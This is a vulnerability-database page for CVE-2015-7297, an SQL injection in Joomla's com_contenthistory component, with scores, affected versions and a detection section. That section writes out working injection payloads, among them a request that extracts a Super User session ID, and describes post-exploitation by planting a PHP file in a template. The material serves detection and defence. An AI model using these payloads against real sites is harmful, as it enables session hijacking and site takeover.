cbcvebase.
CVE-2015-7297
published 2015-10-29

CVE-2015-7297: SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, a different…

PriorityP274high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
99.97%
100.0th percentile
SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, a different vulnerability than CVE-2015-7858.

Affected

15 ranges
VendorProductVersion rangeFixed in
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!

Detection & IOCsextracted from sources · hover to see the quote

url/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)
commandGET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
path/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=
yara
id: CVE-2015-7297
http:
- method: GET
  path:
  - "{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"
  matchers:
  - type: word
    part: body
    words:
    - '{{md5({{num}})}}'
  • Exploit targets the com_contenthistory component via the list[select] GET parameter with error-based or UNION-based SQL injection payloads. Look for HTTP GET requests to /index.php with option=com_contenthistory and a non-empty list[select] parameter.
  • Post-exploitation involves creation of a random-named PHP file in a Joomla template directory via com_templates, then requesting it for RCE. Monitor for POST requests to /administrator/index.php?option=com_templates&task=template.createFile.
  • The exploit checks for a 500 error response containing a backtick-wrapped table name matching the pattern `(.*)_ucm_history` to confirm vulnerability and extract the table prefix.
  • Session hijacking is confirmed when the 500 error response body contains 'Duplicate entry' followed by a hex session ID. Monitor for this pattern in Joomla error responses.
  • ·The SQL injection payload uses error-based technique with updatexml() or floor(rand(0)*2) GROUP BY; the exact payload varies depending on the database configuration and table prefix, which is dynamically retrieved during exploitation.
  • ·Affected versions are Joomla 3.2 through 3.4.4 only; version 3.4.5 contains the security fix.

CVSS provenance

nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.